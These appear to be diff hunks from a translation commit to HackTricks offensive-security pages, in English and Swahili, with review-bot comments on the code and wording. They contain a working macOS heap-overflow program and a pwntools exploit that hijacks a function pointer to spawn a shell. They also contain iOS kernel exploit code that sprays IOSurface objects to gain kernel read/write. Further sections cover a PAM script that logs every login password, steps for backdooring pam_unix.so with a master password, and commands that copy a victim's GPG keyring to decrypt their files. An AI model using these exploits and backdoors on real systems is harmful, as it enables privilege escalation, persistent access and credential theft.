#include <string.h>
#include <unistd.h>
__attribute__((noinline))
static void safe_cb(void) {
puts("[*] safe_cb() called — nothing interesting here.");
}
__attribute__((noinline))
static void win(void) {
puts("[+] win() reached — spawning shell...");
fflush(stdout);
system("/bin/sh");
exit(0);
}
typedef void (*cb_t)(void);
typedef struct {
cb_t cb; // <--- Your target: overwrite this with win()
char tag[16]; // Cosmetic (helps make the chunk non-tiny)
} hook_t;
static void fatal(const char *msg) {
perror(msg);
exit(1);
}
int main(void) {
// Make I/O deterministic
setvbuf(stdout, NULL, _IONBF, 0);
// Print address leak so exploit doesn't guess ASLR
printf("[*] LEAK win() @ %p\n", (void*)&win);
// 1) Allocate the overflow buffer
size_t buf_sz = 128;
char *buf = (char*)malloc(buf_sz);
if (!buf) fatal("malloc buf");
memset(buf, 'A', buf_sz);
// 2) Allocate the hook object (likely adjacent in same magazine/size class)
hook_t *h = (hook_t*)malloc(sizeof(hook_t));
if (!h) fatal("malloc hook");
h->cb = safe_cb;
memcpy(h->tag, "HOOK-OBJ", 8);
// A tiny bit of noise to look realistic (and to consume small leftover holes)
void *spacers[16];
for (int i = 0; i < 16; i++) {
spacers[i] = malloc(64);
if (spacers[i]) memset(spacers[i], 0xCC, 64);
}
puts("[*] You control a write into the 128B buffer (no bounds check).");
puts("[*] Enter payload length (decimal), then the raw payload bytes.");
// 3) Read attacker-chosen length and then read that many bytes → overflow
char line[64];
if (!fgets(line, sizeof(line), stdin)) fatal("fgets");
unsigned long n = strtoul(line, NULL, 10);
// BUG: no clamp to 128
ssize_t got = read(STDIN_FILENO, buf, n);
if (got < 0) fatal("read");
printf("[*] Wrote %zd bytes into 128B buffer.\n", got);
// 4) Trigger: call the hook's callback
puts("[*] Calling h->cb() ...");
h->cb();
puts("[*] Done.");
return 0;
}
```
Compile with:
```bash
clang -O0 -Wall -Wextra -std=c11 -o heap_groom vuln.c
```
## Exploit
> [!WARNING]
> This exploit sets the env variable `MallocNanoZone=0` to disable the NanoZone. This is needed to get adjacent allocations when calling `malloc` with small sizes. Without it, the different mallocs would be placed in different zones and would not be adjacent, so the overflow would not work as expected.
```python
#!/usr/bin/env python3
# Heap overflow exploit for macOS ARM64 CTF challenge
#
# Vulnerability: Buffer overflow in heap-allocated buffer allows overwriting
# a function pointer in an adjacent heap chunk.
#
# Key insights:
# 1. macOS uses different heap zones for different allocation sizes
# 2. The NanoZone must be disabled (MallocNanoZone=0) to get predictable layout
# 3. With spacers allocated after main chunks, the distance is 560 bytes (432 padding needed)
#
from pwn import *
import re
import sys
import struct
import platform
# Detect architecture and set context accordingly
if platform.machine() == 'arm64' or platform.machine() == 'aarch64':
context.clear(arch='aarch64')
else:
context.clear(arch='amd64')
BIN = './heap_groom'
def parse_leak(line):
m = re.search(rb'win\(\) @ (0x[0-9a-fA-F]+)', line)
if not m:
log.failure("Couldn't parse leak")
sys.exit(1)
return int(m.group(1), 16)
def build_payload(win_addr, extra_pad=0):
# We want: [128 bytes padding] + [optional padding for heap metadata] + [overwrite cb pointer]
padding = b'A' * 128
if extra_pad:
padding += b'B' * extra_pad
# Add the win address to overwrite the function pointer
payload = padding + p64(win_addr)
return payload
def main():
# On macOS, we need to disable the Nano zone for adjacent allocations
import os
env = os.environ.copy()
env['MallocNanoZone'] = '0'
# The correct padding with MallocNanoZone=0 is 432 bytes
# This makes the total distance 560 bytes (128 buffer + 432 padding)
# Try the known working value first, then alternatives in case of heap variation
candidates = [
432, # 560 - 128 = 432 (correct padding with spacers and NanoZone=0)
424, # Try slightly less in case of alignment differences
440, # Try slightly more
416, # 16 bytes less
448, # 16 bytes more
0, # Direct adjacency (unlikely but worth trying)
]
log.info("Starting heap overflow exploit for macOS...")
for extra in candidates:
log.info(f"Trying extra_pad={extra} with MallocNanoZone=0")
p = process(BIN, env=env)
# Read leak line
leak_line = p.recvline()
win_addr = parse_leak(leak_line)
log.success(f"win() @ {hex(win_addr)}")
# Skip prompt lines
p.recvuntil(b"Enter payload length")
p.recvline()
# Build and send payload
payload = build_payload(win_addr, extra_pad=extra)
total_len = len(payload)
log.info(f"Sending {total_len} bytes (128 base + {extra} padding + 8 pointer)")
# Send length and payload
p.sendline(str(total_len).encode())
p.send(payload)
# Check if we overwrote the function pointer successfully
try:
output = p.recvuntil(b"Calling h->cb()", timeout=0.5)
p.recvline(timeout=0.5) # Skip the "..." part
# Check if we hit win()
response = p.recvline(timeout=0.5)
if b"win() reached" in response:
log.success(f"SUCCESS! Overwrote function pointer with extra_pad={extra}")
log.success("Shell spawned, entering interactive mode...")
p.interactive()
return
elif b"safe_cb() called" in response:
log.info(f"Failed with extra_pad={extra}, safe_cb was called")
else:
log.info(f"Failed with extra_pad={extra}, unexpected response")
except:
log.info(f"Failed with extra_pad={extra}, likely crashed")
p.close()
log.failure("All padding attempts failed. The heap layout might be different.")
log.info("Try running the exploit multiple times as heap layout can be probabilistic.")
if __name__ == '__main__':
main()
```
{{#include ../../banners/hacktricks-training.md}}
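Review bot: the bare `except:` at the end of the retry loop also swallows `KeyboardInterrupt` and `SystemExit`, so a Ctrl-C while `recvuntil` is waiting is logged as "likely crashed" and the loop silently moves on to the next candidate; catch `EOFError` (what pwntools raises when the target process exits) or at least `Exception`. Two smaller points: `import os` is done inside `main()` while every other import sits at the top of the file, and the header comments describe the macOS userland allocator (`MallocNanoZone=0`, "macOS uses different heap zones") even though this file is the iOS exploiting page, so a sentence saying that this heap-groom example targets macOS malloc would stop readers from expecting it to apply to an iOS kernel target.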


@ -0,0 +1,211 @@
# iOS Physical Use-After-Free via IOSurface
{{#include ../../banners/hacktricks-training.md}}
## Physical use-after-free
Hii ni muhtasari kutoka kwenye post ya [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html). Taarifa zaidi kuhusu exploit inayotumia teknik hii inaweza kupatikana kwenye [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
The **virtual memory address space** kwa michakato ya user kwenye iOS inajulikana kuanzia **0x0 hadi 0x8000000000**. Hata hivyo, anwani hizi hazitafsiri moja kwa moja kuwa physical memory. Badala yake, the **kernel** inatumia **page tables** kutafsiri anwani za virtual kuwa **physical addresses** halisi.
#### Levels of Page Tables in iOS
Page tables zimepangwa kwa hatua tatu:
1. **L1 Page Table (Level 1)**:
* Kila entry hapa inawakilisha eneo kubwa la virtual memory.
* Inafunika **0x1000000000 bytes** (au **256 GB**) ya virtual memory.
2. **L2 Page Table (Level 2)**:
* Entry hapa inawakilisha eneo ndogo zaidi la virtual memory, hasa **0x2000000 bytes** (32 MB).
* Entry ya L1 inaweza kuelekeza kwenye L2 table ikiwa haiwezi kuoanisha eneo lote yenyewe.
3. **L3 Page Table (Level 3)**:
* Hii ni level ya kina zaidi, ambapo kila entry inaoanisha ukurasa mmoja wa **4 KB**.
* Entry ya L2 inaweza kuelekeza kwenye L3 table ikiwa inahitaji udhibiti wa kina zaidi.
#### Mapping Virtual to Physical Memory
* **Direct Mapping (Block Mapping)**:
* Baadhi ya entry kwenye page table zinaoanisha moja kwa moja **msururu wa anwani za virtual** kwa msururu wa contiguous wa anwani za physical (kama njia mkato).
* **Pointer to Child Page Table**:
* Ikiwa inahitajika udhibiti wa kina, entry katika level moja (mfano L1) inaweza kuelekeza kwenye **child page table** kwenye level inayofuata (mfano L2).
#### Example: Mapping a Virtual Address
Tuseme unajaribu kufikia anwani ya virtual **0x1000000000**:
1. **L1 Table**:
* Kernel inakagua entry ya L1 inayohusiana na anwani hii ya virtual. Ikiwa ina **pointer to an L2 page table**, inahamia L2 table hiyo.
2. **L2 Table**:
* Kernel inakagua L2 page table kwa mapping ya kina zaidi. Ikiwa entry hii inaelekeza kwenye **L3 page table**, inaendelea huko.
3. **L3 Table**:
* Kernel inatafuta entry ya mwisho ya L3, ambayo inaelekeza kwenye **physical address** ya ukurasa wa kumbukumbu.
#### Example of Address Mapping
Ikiwa unaandika physical address **0x800004000** kwenye index ya kwanza ya L2 table, basi:
* Anwani za virtual kutoka **0x1000000000** hadi **0x1002000000** zinaoanisha kwa anwani za physical kutoka **0x800004000** hadi **0x802004000**.
* Hii ni **block mapping** kwenye level ya L2.
Akiba, ikiwa entry ya L2 inaelekeza kwenye L3 table:
* Kila ukurasa wa 4 KB kwenye anwani ya virtual **0x1000000000 -> 0x1002000000** utatafsiriwa na entry za kibinafsi katika L3 table.
### Physical use-after-free
Physical **use-after-free** (UAF) hutokea wakati:
1. Mchakato unafanya **allocate** memory fulani kama **readable na writable**.
2. **page tables** zinasasishwa ili kuoanisha memory hii na physical address maalum ambayo mchakato unaweza kufikia.
3. Mchakato una **deallocate** (free) memory hiyo.
4. Hata hivyo, kutokana na **bug**, kernel **inasahau kuondoa mapping** kutoka kwenye page tables, ingawa inaweka physical memory husika kama free.
5. Kernel inaweza kisha **kureallocate memory hii "freed"** kwa matumizi mengine, kama data ya kernel.
6. Kwa kuwa mapping haikuondolewa, mchakato bado anaweza **kusoma na kuandika** kwenye memory hiyo ya physical.
Hii inamaanisha mchakato unaweza kufikia **pages za kernel memory**, ambazo zinaweza kubeba data nyeti au miundo, na hivyo kumruhusu mwizi **kuathiri kernel memory**.
### IOSurface Heap Spray
Kwa kuwa mshambuliaji hana udhibiti wa kurudia ni kurasa gani za kernel zitapatiwa memory iliyofutwa, wanatumia tekniki inayoitwa **heap spray**:
1. Mshambuliaji **anaunda idadi kubwa ya IOSurface objects** katika kernel memory.
2. Kila IOSurface object ina **magic value** katika moja ya fields zake, kufanya iwe rahisi kuibua.
3. Wanapitia **pages zilizofutwa** kuona kama IOSurface objects yoyote imeangukia kwenye ukurasa uliotolewa.
4. Wao wanapogundua IOSurface object kwenye ukurasa uliofutwa, wanaweza kutumia ili **kusoma na kuandika kernel memory**.
Taarifa zaidi kuhusu hili ziko kwenye [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
> [!TIP]
> Tambua kwamba vifaa vya iOS 16+ (A12+) vinamitigation za hardware (kama PPL au SPTM) zinazofanya physical UAF techniques kuwa ngumu zaidi. PPL inatekeleza ulinzi mgumu wa MMU kwenye kurasa zinazohusiana na code signing, entitlements, na data nyeti ya kernel, hivyo, hata ikiwa ukurasa utatumika tena, maandishi kutoka userland au code ya kernel iliyomilikiwa yanazuia kuandika kwenye kurasa zilizolindwa na PPL. Secure Page Table Monitor (SPTM) inaongeza PPL kwa kuimarisha sasisho za page table wenyewe. Inahakikisha kwamba hata code yenye mamlaka ya kernel haiwezi kubadilisha silently mappings au kupindua freed pages bila kupitia ukaguzi salama. KTRR (Kernel Text Read-Only Region), ambayo inalaza eneo la code ya kernel kama read-only baada ya boot. Hii inazuia mabadiliko ya runtime kwa code ya kernel, ikifunga njia kubwa ya shambulio ambayo physical UAF exploits mara nyingi hutegemea. Zaidi ya hayo, allocations za `IOSurface` zimekuwa zisizotarajiwa na ngumu zaidi kupangwa ndani ya maeneo yanayoweza kufikiwa na user, jambo linalofanya mbinu ya “magic value scanning” kuwa isiyokuwa na uhakika. Na `IOSurface` sasa inalindwa na entitlements na vizuizi vya sandbox.
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: mshambuliaji anaunda IOSurface objects nyingi zilizo na kitambulisho maalum ("magic value").
2. **Scan Freed Pages**: wanakagua ikiwa yoyote ya objects imewekwa kwenye ukurasa uliotolewa.
3. **Read/Write Kernel Memory**: kwa kuathiri fields ndani ya IOSurface object, wanapata uwezo wa kufanya **arbitrary reads and writes** katika kernel memory. Hii inawawezesha:
* Kutumia field moja kusoma **kiasi chochote cha 32-bit** katika kernel memory.
* Kutumia field nyingine kuandika **64-bit values**, wakifikia primitive imara ya **kernel read/write**.
Generate IOSurface objects with the magic value IOSURFACE_MAGIC to later search for:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
```
Tafuta vitu vya **`IOSurface`** katika ukurasa mmoja wa kimwili uliotolewa:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
```
### Kupata kusoma/kuandika kwa kernel kwa kutumia IOSurface
Baada ya kupata udhibiti wa objekti ya IOSurface katika kernel memory (imepangwa kwenye ukurasa wa kimwili uliotolewa unaopatikana kutoka userspace), tunaweza kuitumia kwa **operesheni zozote za kusoma na kuandika katika kernel**.
**Minda Muhimu katika IOSurface**
Objekti ya IOSurface ina vipengele viwili muhimu:
1. **Use Count Pointer**: Inaruhusu **kusoma kwa 32-bit**.
2. **Indexed Timestamp Pointer**: Inaruhusu **kuandika kwa 64-bit**.
Kwa kuandika upya pointers hizi, tunaziweka kuonyesha anwani zozote katika kernel memory, hivyo kuwezesha uwezo wa kusoma/kuandika.
#### Kusoma kwa 32-bit kwa kernel
Ili kufanya kusoma:
1. Bandika upya **use count pointer** ili ianze kuonyesha anwani lengwa ukiokoa offset ya 0x14-byte.
2. Tumia method `get_use_count` kusoma thamani kwenye anwani hiyo.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
```
#### 64-Bit Kernel Write
Ili kufanya uandishi:
1. Andika tena **indexed timestamp pointer** kwa anwani lengwa.
2. Tumia method ya `set_indexed_timestamp` kuandika thamani ya 64-bit.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### Exploit Flow Recap
1. **Sababisha Physical Use-After-Free**: Kurasa zilizotolewa zinaweza kutumika tena.
2. **Spray IOSurface Objects**: Tenga vitu vingi vya IOSurface na "magic value" ya kipekee katika kernel memory.
3. **Identify Accessible IOSurface**: Tafuta IOSurface kwenye ukurasa uliotolewa unaodhibiti.
4. **Abuse Use-After-Free**: Badilisha pointers katika object ya IOSurface ili kuwezesha arbitrary **kernel read/write** kupitia IOSurface methods.
Kwa kutumia primitives hizi, the exploit hutoa controlled **32-bit reads** na **64-bit writes** kwa kernel memory. Hatua za ziada za jailbreak zinaweza kuhusisha primitives za read/write zenye utulivu zaidi, ambazo zinaweza kuhitaji kupitisha ulinzi wa ziada (mfano, PPL kwenye vifaa vipya vya arm64e).
{{#include ../../banners/hacktricks-training.md}}
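Review bot: `*nClients = (*nClients) += 1;` in `spray_iosurface` stores to `*nClients` twice within one expression with no sequence point between the two stores, which is undefined behaviour in C; `*nClients += 1;` (or `(*nClients)++;`) is what is meant. The `if (*nClients >= 0x4000) return;` guard runs once before the `for` loop rather than per iteration, so a call with `nSurfaces > 1` when the count is already close to `0x4000` writes past the end of the `surfaceIDs` buffer that `iosurface_krw` allocates with exactly `0x4000` entries; move the check inside the loop. The three snippets also use `info`, `iosurface_get_pixel_format`, `iosurface_get_alloc_size`, `iosurface_get_receiver`, `iosurface_release` and the `iosurface_set_*_pointer` helpers without defining them; a sentence saying these come from the kfd repository linked above would tell readers where to look.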


@ -4,23 +4,23 @@
## Sniffing Logon Passwords with PAM
Wacha tuchague moduli ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa hujui PAM ni nini angalia:
Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
{{#ref}}
pam-pluggable-authentication-modules.md
{{#endref}}
**For further details check the [original post](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Kwa maelezo zaidi angalia [chapisho la asili](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Technique Overview:**
Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo ya Unix. Zinaboresha security kwa kuruhusu ubinafsishaji wa michakato ya login lakini pia zinaweza kuleta hatari endapo zitatumiwa vibaya. Muhtasari huu unaelezea technique ya kukamata login credentials kwa kutumia PAM, pamoja na mitigation strategies.
**Muhtasari wa Mbinu:**
Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo inayotegemea Unix. Zinaweza kuboresha usalama kwa kubadilisha mchakato wa kuingia, lakini pia zinaweza kuleta hatari ikiwa zitatumika vibaya. Muhtasari huu unaelezea mbinu ya kukamata cheti za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari.
**Capturing Credentials:**
**Kukamata cheti za kuingia:**
- Script ya bash yenye jina `toomanysecrets.sh` imeandikwa ili kurekodi jaribio za login, ikichukua tarehe, jina la mtumiaji (`$PAM_USER`), password (kupitia stdin), na IP ya host ya mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`.
- Script imefanywa executable na kuingizwa katika configuration ya PAM (`common-auth`) kwa kutumia module `pam_exec.so` na chaguzi za kuendesha kimya na kufikisha authentication token kwa script.
- Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi credentials kwa utulivu.
- Skripti ya bash iitwayo `toomanysecrets.sh` imeandaliwa ili kurekodi jaribio za kuingia, ikikusanya tarehe, jina la mtumiaji (`$PAM_USER`), nenosiri (kupitia stdin), na anwani ya IP ya mwenyeji wa mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`.
- Skripti hiyo inafanywa iwe executable na kuingizwa kwenye usanidi wa PAM (`common-auth`) kwa kutumia moduli `pam_exec.so` na chaguo za kuendesha kwa kimya na kumfichulia skripti tokeni ya uthibitishaji.
- Njia hii inaonyesha jinsi mwenyeji wa Linux aliyevunjwa usalama anaweza kutumika kurekodi cheti za kuingia kwa siri.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
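# Review bot: "Wacha tuchague moduli ya PAM" renders "Let's configure a PAM module" with kuchagua (to choose);
# "Wacha tusanidi moduli ya PAM" keeps the meaning of configuring the module. In the bullet list,
# "jaribio za kuingia" should agree in number as "majaribio ya kuingia", and the bold lead "Kukamata cheti
# za kuingia" uses cheti (certificate) for credentials, which invites confusion with TLS certificates;
# "hati za kuingia", or leaving "credentials" untranslated as the page does for other technical terms, is clearer.
# Whichever variant of each paired line is kept, the file should not end up with the same sentence in both
# English and Swahili (the two "Let's configure..." lines and the two "Technique Overview" paragraphs).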
@ -34,31 +34,30 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
**Kwa maelezo zaidi angalia [original post](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu:
Pluggable Authentication Module (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa watumiaji. Inaendeshwa kwa misingi mitatu kuu: **username**, **password**, na **service**. Faili za usanidi kwa kila service ziko kwenye saraka `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji.
Pluggable Authentication Module (PAM) ni mfumo unaotumika kwenye Linux kwa uthibitishaji wa watumiaji. Inafanya kazi kwa msingi wa dhana tatu kuu: **username**, **password**, na **service**. Faili za usanidi za kila service ziko kwenye saraka ya `/etc/pam.d/`, ambapo maktaba zilizoshirikiwa (shared libraries) zinashughulikia uthibitishaji.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumika na faili `common-auth`, ambayo imejumuishwa na karibu services zote kwa password verification.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa password maalum, ukiepuka password halisi ya mtumiaji. Hii inalenga hasa maktaba ya shared `pam_unix.so` inayotumiwa na faili ya `common-auth`, ambayo imejumuishwa na karibu kila service kwa uhakiki wa password.
### Steps for Modifying `pam_unix.so`:
1. **Locate the Authentication Directive** in the `common-auth` file:
- Mstari unaowajibika kwa kuangalia password ya mtumiaji unaitisha `pam_unix.so`.
2. **Modify Source Code**:
- Ongeza tamko la upendeleo (conditional) kwenye faili la chanzo `pam_unix_auth.c` ambalo linampa ufikiaji ikiwa password iliyowekwa mapema imetumika, vinginevyo linaendelea na mchakato wa kawaida wa authentication.
3. **Recompile and Replace** the modified `pam_unix.so` library in the appropriate directory.
- Recompile na ubadilishe maktaba `pam_unix.so` iliyorekebishwa kwenye saraka husika.
4. **Testing**:
- Ufikiaji unatolewa kwa services mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyotangazwa kabla, wakati michakato ya kawaida ya authentication haidhuriwa.
1. **Pata Directive ya Uthibitishaji** katika faili ya `common-auth`:
- Mstari unaohusika na kuangalia password ya mtumiaji unaita `pam_unix.so`.
2. **Badilisha Source Code**:
- Ongeza kauli ya masharti (conditional) katika faili ya chanzo `pam_unix_auth.c` ambayo inatoa ruhusa ikiwa password iliyowekwa mapema imetumika, vinginevyo inaendelea na mchakato wa uthibitishaji wa kawaida.
3. **Recompile and Replace** maktaba iliyorekebishwa `pam_unix.so` katika saraka inayofaa.
4. **Kupima**:
- Ruhusa inatolewa katika huduma mbalimbali (login, ssh, sudo, su, screensaver) kwa password iliyotangazwa, wakati michakato ya kawaida ya uthibitishaji haijathiriwa.
> [!TIP]
> Unaweza kuendesha mchakato huu kwa kiotomatiki kwa kutumia [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
> Unaweza kuendesha kiotomatiki mchakato huu na [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
## Decrypting GPG loot via homedir relocation
## Kudekripti faili za GPG kwa kuhamisha homedir
If you find an encrypted `.gpg` file and a users `~/.gnupg` folder (pubring, private-keys, trustdb) but you cant decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
Ikiwa unatambua faili iliyofichwa `.gpg` na saraka ya mtumiaji `~/.gnupg` (pubring, private-keys, trustdb) lakini huwezi kudekripti kutokana na ruhusa/mifungo ya homedir ya GnuPG, nakili keyring hadi mahali pa kuandikika na uitumie kama GPG home yako.
Makosa ya kawaida utakayoyaona bila hili: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Marejesho ya kawaida utakayoyaona bila hii: "unsafe ownership on homedir", "failed to create temporary file", au "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Workflow:
Mtiririko wa kazi:
```bash
# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
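# Review bot: of the two paired lines about common GnuPG errors, the one starting "Marejesho ya kawaida" uses
# marejesho (returns/refunds) where "Makosa" (errors) is right; keep the "Makosa ya kawaida" variant. Typos in
# the English lines: "a users `~/.gnupg`" should be "a user's" and "cant" should be "can't". On the pam_unix.so
# backdoor steps: the overview earlier on the page says the section covers mitigation strategies, but none
# appear here; a short line on verifying the installed module against the package manager (`dpkg -V libpam-modules`
# on Debian/Ubuntu, `rpm -V pam` on RHEL/Fedora) and alerting on changes to `/etc/pam.d/common-auth` and the
# `pam_unix.so` file would fulfil that promise.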
@ -71,10 +70,10 @@ GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
```
Ikiwa nyenzo za ufunguo wa siri zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuuliza passphrase (au itauliza ikiwa ufunguo umewekwa ulinzi).
Iwapo nyenzo za siri za ufunguo zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuomba passphrase (au itaomba ikiwa ufunguo umehifadhiwa kwa ulinzi).
## Marejeo
## References
- [0xdf HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
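Review bot: the second reference title, "GnuPG Manual Home directory and GNUPGHOME", has lost the separator between the manual's name and the section; "GnuPG Manual: Home directory and GNUPGHOME" reads correctly. The heading pair "## Marejeo" / "## References" should follow whichever convention the other translated pages in this commit use for the references heading, so the table of contents stays consistent.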

File diff suppressed because it is too large


@ -1,10 +1,10 @@
# Kupima Usalama wa Programu za Android Pentesting
# Programu za Android Pentesting
{{#include ../../banners/hacktricks-training.md}}
## Misingi ya Programu za Android
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **vipengele muhimu zaidi vinavyohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
{{#ref}}
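Review bot: neither variant of the H1 reads cleanly: "Kupima Usalama wa Programu za Android Pentesting" says "security testing of Android applications" and "pentesting" twice over, and "Programu za Android Pentesting" drops the testing sense and reads as "Android pentesting applications". "Kupima Usalama wa Programu za Android", or "Android Applications Pentesting" left untranslated like the other tool and technique names on the page, carries the original meaning.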
@ -13,24 +13,24 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
This is the main tool you need to connect to an android device (emulated or physical).\
**ADB** allows to control devices either over **USB** or **Network** from a computer. This utility enables the **copying** of files in both directions, **installation** and **uninstallation** of apps, **execution** of shell commands, **backing up** of data, **reading** of logs, among other functions.
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (imeigwa au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au kupitia **Network** kutoka kwa kompyuta. Kifaa hiki kinawezesha **kunakili** faili kwa pande zote, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kufanya backup** ya data, **kusoma** logs, miongoni mwa kazi nyingine.
Take a look to the following list of [**ADB Commands**](adb-commands.md) to learn how to use adb.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili ujifunze jinsi ya kutumia adb.
## Smali
Sometimes it is interesting to **modify the application code** to access **hidden information** (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**.
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flags). Kisha, inaweza kuwa ya manufaa ku-decompile APK, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** zitakazowasilishwa. Kwa hiyo, **kumbuka daima uwezekano huu**.
## Other interesting tricks
## Mbinu nyingine za kuvutia
- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Extract APK from device:
- Chomoa APK kutoka kwenye kifaa:
```bash
adb shell pm list packages
com.android.insecurebankv2
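# Review bot: "Kifaa hiki kinawezesha kunakili faili" refers to ADB with kifaa (device), but the sentence
# describes the utility; "Zana hii inawezesha" is the right subject. The English link text kept in the
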